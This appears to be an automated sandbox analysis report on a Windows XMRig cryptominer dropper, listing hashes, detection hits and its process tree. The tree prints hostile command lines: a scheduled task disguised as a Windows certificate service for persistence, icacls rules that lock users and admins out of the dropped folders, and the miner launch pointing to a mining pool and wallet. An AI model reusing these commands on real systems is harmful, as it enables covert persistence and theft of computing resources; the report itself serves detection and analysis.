Analysis
-
max time kernel
150s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-12-2024 23:39
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe
Resource
win7-20240903-en
General
-
Target
JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe
-
Size
11.8MB
-
MD5
a5816f6bba79d7761d42ee61d8bd11f5
-
SHA1
90c05a7427b077fbe81c34fd6fc4f2e6bc608558
-
SHA256
3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5
-
SHA512
51c794ce8569c367f475ffb85c15f5efa10c5ea7da86b1336fbeb1cab2fcf5468a26feed252a2fe5eaa5a376a9ae9bd5f87d9b28cc90580e6e98b3d242076eda
-
SSDEEP
196608:kF7gX0Meai3sCD1yjXEypazPx7WVacovyq6aejL+jGD71iEHiaJzZvdE+cZLIAfr:kF7oxeOOy9ajx0rq+jL+aD5iORdKZMkr
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 33 IoCs
resource yara_rule behavioral2/memory/4804-2-0x00007FF65C300000-0x00007FF65E398000-memory.dmp xmrig behavioral2/memory/4804-3-0x00007FF65C300000-0x00007FF65E398000-memory.dmp xmrig behavioral2/memory/4804-4-0x00007FF65C300000-0x00007FF65E398000-memory.dmp xmrig behavioral2/memory/4804-5-0x00007FF65C300000-0x00007FF65E398000-memory.dmp xmrig behavioral2/memory/4804-6-0x00007FF65C300000-0x00007FF65E398000-memory.dmp xmrig behavioral2/memory/4804-10-0x00007FF65C300000-0x00007FF65E398000-memory.dmp xmrig behavioral2/memory/4804-16-0x00007FF65C300000-0x00007FF65E398000-memory.dmp xmrig behavioral2/memory/4600-19-0x00007FF7A9380000-0x00007FF7AB418000-memory.dmp xmrig behavioral2/memory/4600-20-0x00007FF7A9380000-0x00007FF7AB418000-memory.dmp xmrig behavioral2/memory/4600-21-0x00007FF7A9380000-0x00007FF7AB418000-memory.dmp xmrig behavioral2/memory/4600-22-0x00007FF7A9380000-0x00007FF7AB418000-memory.dmp xmrig behavioral2/memory/4600-23-0x00007FF7A9380000-0x00007FF7AB418000-memory.dmp xmrig behavioral2/memory/4600-25-0x00007FF7A9380000-0x00007FF7AB418000-memory.dmp xmrig behavioral2/memory/4600-61-0x00007FF7A9380000-0x00007FF7AB418000-memory.dmp xmrig behavioral2/memory/4600-62-0x00007FF7A9380000-0x00007FF7AB418000-memory.dmp xmrig behavioral2/memory/4716-67-0x00007FF6C21A0000-0x00007FF6C4238000-memory.dmp xmrig behavioral2/memory/4716-66-0x00007FF6C21A0000-0x00007FF6C4238000-memory.dmp xmrig behavioral2/memory/4716-68-0x00007FF6C21A0000-0x00007FF6C4238000-memory.dmp xmrig behavioral2/memory/4716-69-0x00007FF6C21A0000-0x00007FF6C4238000-memory.dmp xmrig behavioral2/memory/4716-70-0x00007FF6C21A0000-0x00007FF6C4238000-memory.dmp xmrig behavioral2/memory/4600-72-0x00007FF7A9380000-0x00007FF7AB418000-memory.dmp xmrig behavioral2/memory/4716-73-0x00007FF6C21A0000-0x00007FF6C4238000-memory.dmp xmrig behavioral2/memory/4600-74-0x00007FF7A9380000-0x00007FF7AB418000-memory.dmp xmrig behavioral2/memory/4716-75-0x00007FF6C21A0000-0x00007FF6C4238000-memory.dmp xmrig behavioral2/memory/4600-76-0x00007FF7A9380000-0x00007FF7AB418000-memory.dmp xmrig behavioral2/memory/4716-77-0x00007FF6C21A0000-0x00007FF6C4238000-memory.dmp xmrig behavioral2/memory/4600-78-0x00007FF7A9380000-0x00007FF7AB418000-memory.dmp xmrig behavioral2/memory/4716-79-0x00007FF6C21A0000-0x00007FF6C4238000-memory.dmp xmrig behavioral2/memory/4600-80-0x00007FF7A9380000-0x00007FF7AB418000-memory.dmp xmrig behavioral2/memory/4716-82-0x00007FF6C21A0000-0x00007FF6C4238000-memory.dmp xmrig behavioral2/memory/4600-83-0x00007FF7A9380000-0x00007FF7AB418000-memory.dmp xmrig behavioral2/memory/4716-84-0x00007FF6C21A0000-0x00007FF6C4238000-memory.dmp xmrig behavioral2/memory/4600-85-0x00007FF7A9380000-0x00007FF7AB418000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation CertificateClient.exe -
Executes dropped EXE 2 IoCs
pid Process 4600 CertificateClient.exe 4716 msvcr_client.exe -
Modifies file permissions 1 TTPs 6 IoCs
pid Process 5100 icacls.exe 1980 icacls.exe 2076 icacls.exe 1476 icacls.exe 2112 icacls.exe 2688 icacls.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 20 IoCs
pid Process 4804 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 4804 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4716 msvcr_client.exe 4716 msvcr_client.exe 4716 msvcr_client.exe 4600 CertificateClient.exe 4716 msvcr_client.exe 4600 CertificateClient.exe 4716 msvcr_client.exe 4600 CertificateClient.exe 4716 msvcr_client.exe 4600 CertificateClient.exe 4716 msvcr_client.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4716 msvcr_client.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ CertificateClient.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2128 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe 4600 CertificateClient.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4600 CertificateClient.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeLockMemoryPrivilege 4716 msvcr_client.exe Token: SeLockMemoryPrivilege 4716 msvcr_client.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4716 msvcr_client.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 4804 wrote to memory of 2128 4804 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 82 PID 4804 wrote to memory of 2128 4804 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 82 PID 4804 wrote to memory of 2688 4804 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 84 PID 4804 wrote to memory of 2688 4804 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 84 PID 4804 wrote to memory of 5100 4804 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 86 PID 4804 wrote to memory of 5100 4804 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 86 PID 4804 wrote to memory of 1980 4804 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 88 PID 4804 wrote to memory of 1980 4804 JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe 88 PID 4600 wrote to memory of 2076 4600 CertificateClient.exe 100 PID 4600 wrote to memory of 2076 4600 CertificateClient.exe 100 PID 4600 wrote to memory of 1476 4600 CertificateClient.exe 102 PID 4600 wrote to memory of 1476 4600 CertificateClient.exe 102 PID 4600 wrote to memory of 2112 4600 CertificateClient.exe 104 PID 4600 wrote to memory of 2112 4600 CertificateClient.exe 104 PID 4600 wrote to memory of 4716 4600 CertificateClient.exe 106 PID 4600 wrote to memory of 4716 4600 CertificateClient.exe 106 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_3680374ad10154284b2416650dc1580d1dc17fa17571becd25f5480fc29a14d5.exe"1⤵
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /TN "Windows\CertificateServicesClient\CryptoPolicyTask" /TR "C:\ProgramData\msvcr_cache\CertificateClient.exe" /SC MINUTE2⤵
- Scheduled Task/Job: Scheduled Task
PID:2128
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\ProgramData\msvcr_cache" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"2⤵
- Modifies file permissions
PID:2688
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\ProgramData\msvcr_cache" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"2⤵
- Modifies file permissions
PID:5100
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\ProgramData\msvcr_cache" /inheritance:e /deny "admin:(R,REA,RA,RD)"2⤵
- Modifies file permissions
PID:1980
-
-
C:\ProgramData\msvcr_cache\CertificateClient.exeC:\ProgramData\msvcr_cache\CertificateClient.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\ProgramData\CertificateServicesServer" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"2⤵
- Modifies file permissions
PID:2076
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\ProgramData\CertificateServicesServer" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"2⤵
- Modifies file permissions
PID:1476
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\ProgramData\CertificateServicesServer" /inheritance:e /deny "admin:(R,REA,RA,RD)"2⤵
- Modifies file permissions
PID:2112
-
-
C:\ProgramData\CertificateServicesServer\msvcr_client.exe"C:\ProgramData\CertificateServicesServer\msvcr_client.exe" -o xmr-eu1.nanopool.org:14444 -u 49ZWqdCaWsNRwMPmgBraFaQXgs2PMJacE7aaDCf7CsnAfcE1KM93L93f8jN6a8C5Z2CBXGFnHX1LkK6rsKmbjmnqDhbr2jR -a rx/0 -p x --cpu-max-threads-hint=802⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4716
-